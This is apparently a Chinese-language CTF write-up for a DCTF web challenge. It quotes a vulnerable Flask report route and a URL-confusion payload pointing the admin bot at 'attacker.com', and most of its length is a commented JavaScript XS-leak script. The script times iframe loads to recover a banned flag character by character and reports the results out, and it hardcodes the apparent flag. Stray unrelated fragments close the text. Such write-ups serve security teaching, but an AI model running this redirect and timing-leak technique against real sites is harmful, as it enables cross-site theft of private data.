参考: https://0x90r00t.com/2024/09/30/3708/
题目信息
有些事情最好还是保持低调。当然,除非你是个真正的怪胎。
注意:该网站通过HTTPS提供服务
标志格式:DCTF{}
题目实现了一个类似视频网站的东西
在其提供的数据库中我们能看到被ban的视频,其名称为flag的值
被ban的东西只能由管理员查看
if movie.banned != False and current_user.role != 'real_freak':movies.pop(i)
此处存在我们可以控制的url
# 定义报告路由,处理 POST 请求,需要登录才能访问
@main.route('/report', methods=['POST'])
@login_required
def report():# 构建访问的 URLurl = "https://127.0.0.1" + request.form.get('movie')# 创建一个新线程,调用 visit 函数访问该 URLthread = threading.Thread(target=visit,args=(url,))# 启动线程thread.start()return 'OK'
我们可以构造类似如下的有效负载
https://127.0.0.1@attacker.com
当大文件被加载,其会产生一定的延迟,我们可以使用iframe观测其加载完成的时间
参考: https://0x90r00t.com/2024/09/30/3708/
<body></body>
<script type="text/javascript">
// 定义所有可能用于破解flag的候选字符集(注意:字符 `_` 缺失,`` 可能存在排版错误)
const characters = '| !"#$&\'()*+,-./0123456789:;<=>?@[\\]^``abcdefghijklmnopqrstuvwxyz{}~';// 存储每个字符的响应时间测量结果
let timings = {};// 当前猜测的flag(初始值为占位flag,实际会通过时间分析逐步破解)
let currentFlag = 'DCTF{l3ak_ev3ry_d4y_0f_ev3ry_w33k}';// 当前正在测试的字符索引(按characters顺序遍历)
let charIndex = 0;// 最大测试轮次(初始值为0,可能需要调整以增加准确性)
let maxRounds = 0;// 根据记录的响应时间对字符排序(降序,时间越长排越前)
function getSortedKeysByTiming(timings) {return Object.keys(timings).sort((a, b) => timings[b] - timings[a]);
}// 向服务器发送日志(用于远程记录测试数据)
function log(message) {const xhr = new XMLHttpRequest();xhr.open("GET", "/?" + message); // 将数据通过GET参数发送xhr.send();
}/*** 测量特定字符组合的响应时间* @param {string} char - 当前测试的字符* @param {string} flag - 当前猜测的完整flag(包含已确定字符+测试字符)*/
function measureTiming(char, flag) {// 通过隐藏的iframe发起请求,测量加载时间const iframe = document.createElement('iframe');// 请求本地服务器接口,q参数携带猜测的flagiframe.src = 'https://127.0.0.1:5000/watchlist?q=' + encodeURIComponent(flag);document.body.appendChild(iframe);const startTime = performance.now(); // 记录精确的时间起点// 根据iframe加载结果更新计时数据iframe.onload = () => updateTiming(char, performance.now() - startTime);iframe.onerror = () => updateTiming(char, -1); // 错误时记录-1
}/*** 更新字符计时数据并继续处理* @param {string} char - 被测试的字符* @param {number} time - 测量的响应时间(毫秒)*/
function updateTiming(char, time) {// 仅保留最大时间值(假设正确字符会触发更长响应)if (!(char in timings) || time > timings[char]) {timings[char] = time;}log(`${char}: ${time}`); // 发送日志clearFrames(); // 清理iframeprocessNextChar(); // 处理下一个字符
}// 清除所有iframe防止内存泄漏
function clearFrames() {document.body.innerHTML = ''; // 清空body内所有内容
}/*** 主逻辑:按顺序测试每个字符,完成一轮后分析结果*/
function processNextChar() {// 遍历所有候选字符if (charIndex < characters.length) {const currentChar = characters[charIndex];// 测试当前猜测flag+当前字符的组合(例如:"DCTF{a")measureTiming(currentChar, currentFlag + currentChar);charIndex++;} else {// 一轮完成,按响应时间排序字符const sortedKeys = getSortedKeysByTiming(timings);log('fini ' + sortedKeys.join(',')); // 上报结果// 如果还有剩余轮次,重置索引继续测试(可能需要多轮验证)if (maxRounds-- > 0) {charIndex = 0;processNextChar();}}
}// 启动时间攻击
processNextChar();
</script>
)
——4.9多协议标签交换MPLS)
5.14)
